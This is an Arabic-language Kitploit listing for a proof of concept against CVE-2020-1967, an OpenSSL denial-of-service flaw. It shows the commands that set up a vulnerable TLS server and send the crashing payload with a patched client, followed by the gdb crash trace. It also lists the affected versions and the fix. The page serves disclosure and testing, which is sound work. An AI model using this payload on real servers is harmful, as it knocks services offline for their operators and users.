Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-1967 — استغلال إثبات المفهوم لثغرة حجب الخدمة (DoS) في OpenSSL signature_algorithms_cert (CVE-2020-1967) | Kitploit
أدوات/GitHubGitHub/irsl/cve-2020-1967
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقاستغلال الملفات الثنائية
GitHubirsl/cve-2020-1967

CVE-2020-1967

استغلال إثبات المفهوم لثغرة حجب الخدمة (DoS) في OpenSSL signature_algorithms_cert (CVE-2020-1967)

عرض المستودع
205منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-1967

استغلال لإثبات الفكرة حول ثغرة رفض الخدمة (DoS) في OpenSSL عبر امتداد signature_algorithms_cert (CVE-2020-1967). يعود الفضل في الاكتشاف الأصلي إلى Bernd Edlinger، مع تحليلات إضافية من Matt Caswell وBenjamin Kaduk، وهذا العرض التوضيحي من إعداد Imre Rad.

المتطلبات الأساسية

تطبيقات الخادم أو العميل التي تستدعي الدالة SSL_check_chain() أثناء أو بعد مصافحة TLS 1.3. وفقًا للتوثيق، تتحقق SSL_check_chain() مما إذا كانت الشهادة x والمفتاح الخاص pk وسلسلة الشهادات chain مناسبة للاستخدام مع الجلسة الحالية s. استدعاء هذه الدالة غير موجود في مشروعي Apache httpd أو Nginx الشهيرين.

العرض التوضيحي

لاستغلال هذه الثغرة، يجب إرسال امتداد TLS مخصص من نوع signature_algorithms_cert كجزء من رسالة Hello. استخدمت نسخة معدّلة من مكتبة openssl لبناء مثل هذا العميل؛ الخادم هو تطبيق s_server المدمج في openssl، مع خيارات -x لتفعيل مسار البرنامج الذي يستدعي SSL_check_chain.

إعداد الخادم على Debian المستقر (باستخدام النسخة المتأثرة بالثغرة صراحةً):

root@kitploit:~
root@489def7f3594:/data# apt install libssl1.1=1.1.1d-0+deb10u2 openssl=1.1.1d-0+deb10u2
...

root@489def7f3594:/data# openssl version
OpenSSL 1.1.1d  10 Sep 2019

root@489def7f3594:/data# openssl s_server -cert cert.pem -key key.pem  -accept 8443 -verify 1 -tls1_3 -xkey key.pem -xcert cert.pem  -xchain cert.pem
verify depth is 1
Using default temp DH parameters
ACCEPT

إرسال الحمولة (payload) باستخدام العميل المعدّل:

root@kitploit:~
root@489def7f3594:/data# /path/to/patched/openssl s_client -connect 127.0.0.1:8443 -tls1_3 -cert cert.pem -key key.pem -sigalgs rsa_pss_rsae_sha256
CONNECTED(00000004)
Sending CVE-2020-1967 payload
...

ومن المفترض أن يتعطل الخادم عند هذه النقطة بحدوث خطأ تجزئة (segfault). يبدو ملف core كما يلي:

root@kitploit:~
root@489def7f3594:/data/1# gdb /data/openssl-1.1.1d/apps/openssl core
GNU gdb (Ubuntu 9.1-0ubuntu1) 9.1
Copyright (C) 2020 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /data/openssl-1.1.1d/apps/openssl...
(No debugging symbols found in /data/openssl-1.1.1d/apps/openssl)
[New LWP 26319]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Core was generated by `/data/openssl-1.1.1d/apps/openssl s_server -cert cert.pem -key key.pem -accept'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x00007f09bcff3770 in tls1_check_sig_alg.part.0.cold () from /data/openssl-1.1.1d/libssl.so
(gdb) bt
#0  0x00007f09bcff3770 in tls1_check_sig_alg.part.0.cold () from /data/openssl-1.1.1d/libssl.so
#1  0x00007f09bd03f309 in tls1_check_chain () from /data/openssl-1.1.1d/libssl.so
#2  0x00007f09bd403fc8 in set_cert_cb ()
#3  0x00007f09bd037f75 in tls_post_process_client_hello () from /data/openssl-1.1.1d/libssl.so
#4  0x00007f09bd02703f in state_machine.part () from /data/openssl-1.1.1d/libssl.so
#5  0x00007f09bcffa3f8 in ssl3_write_bytes () from /data/openssl-1.1.1d/libssl.so
#6  0x00007f09bd00fbb9 in ssl_write_internal () from /data/openssl-1.1.1d/libssl.so
#7  0x00007f09bd00fd07 in SSL_write () from /data/openssl-1.1.1d/libssl.so
#8  0x00007f09bd3e337d in sv_body ()
#9  0x00007f09bd40757a in do_server ()
#10 0x00007f09bd3e7c27 in s_server_main ()
#11 0x00007f09bd3cea46 in do_cmd ()
#12 0x00007f09bd3b89fd in main ()

الإصدارات المتأثرة

الإصدارات المتأثرة هي: OpenSSL 1.1.1d و1.1.1e و1.1.1f. أول إصدار تم إصلاحه هو OpenSSL 1.1.1g.

المراجع

  • https://www.openssl.org/news/secadv/20200421.txt

  • https://github.com/openssl/openssl/issues/11500

  • https://github.com/openssl/openssl/commit/a87f3fe01a5a894aa27ccd6a239155fd129988e4

تنزيل الأداة